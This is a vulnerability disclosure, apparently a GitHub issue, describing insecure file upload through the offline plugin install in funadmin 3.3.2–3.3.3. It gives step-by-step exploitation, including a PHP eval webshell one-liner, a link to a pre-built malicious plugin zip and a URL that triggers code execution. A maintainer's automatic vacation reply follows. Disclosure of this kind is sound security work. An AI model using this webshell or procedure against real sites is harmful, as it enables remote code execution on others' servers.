Insecure file upload via plugins install in funadmin v3.3.2 - v3.3.3

[Leeyangee]

Vulnerability Product:funadmin
Vulnerability version:.3.3.2 - 3.3.3
Vulnerability type:Insecure file upload
Vulnerability Details：
Vulnerability location app\backend\controller\Addon.php#localinstall method

the method:localinstall doesn't check any webshell or sensitive function in file, which may cause insecure file upload.

firstly, we download a free plugin and unzip it. the rootpath of plugin is as follows:

then, we add a webshell into /public/js

content of shell: <?pup @eval($_REQUEST['shell']); ?>
after it, we zip the entire plugin

example plugin(already placed webshell): https://github.com/Leeyangee/leeya_bug/raw/main/demo.zip

finally, we just find a website uses funadmin v3.3.2, visit: http://localhost/backend/index/index.html, click "install offline" "离线安装"

and select the plugin we just zipped, after installed , visit http://localhost/static/demo/js/shell.php?shell=phpinfo();

Proof that this has been uploaded webshell via plugins install

Discoverer:leeya_bug

[funadmin]

这是来自QQ邮箱的假期自动回复邮件。   您好，我最近正在休假中，无法亲自回复您的邮件。我将在假期结束后，尽快给您回复。